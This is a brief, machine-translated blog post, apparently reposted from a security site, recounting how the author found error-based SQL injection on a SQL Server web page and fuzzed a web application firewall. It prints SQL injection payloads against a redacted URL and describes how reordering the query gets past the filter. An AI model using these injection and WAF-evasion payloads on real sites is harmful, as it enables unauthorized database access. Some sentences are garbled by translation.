Shulou(Shulou.com)06/01 Report--

Preface of 0x00

It is really very simple. If you are a novice, I hope I can bring you some ideas. If you are an old bird, then emm....

Cause of 0x01

The tool scanned to a site with sqlserver features

Usually appear this kind of error message, indicating that the site is improperly configured, the error message will be displayed directly, and there is no mandatory type conversion information, then there will generally be error injection! Let's test it.

But the message of WAF appeared.

0x02 fuzz

When we encounter WAF, we first have to see what keyword triggers the intercept request, so let's do a simple debugging first.

Http://xxxx/xxxx.aspx?xxxx=1' and-- a

Syntax errors are normal, because we have added and with no value after it, so we can assume that the statement becomes

Select xxx from xxx where xxxx=1' and-- a

But we found that WAF is not actually triggered, indicating that the and keyword is not in the filtered list. Continue to try.

Http://xxxx/xxxx.aspx?xxxx=1' and 1-1-a

Unexpectedly triggered WAF, after many debugging, found that and can not be followed by a number. So it won't be wrong.

Http://xxxx/xxxx.aspx?xxxx=1' and axiom 1-- a

Then try the original code again, adjust the order, and succeed!

Http://xxxx/xxxx.aspx?xxxx=1' and @ @ version=1-- a

Welcome to subscribe "Shulou Technology Information " to get latest news, interesting things and hot topics in the IT industry, and controls the hottest and latest Internet news, technology news and IT industry trends.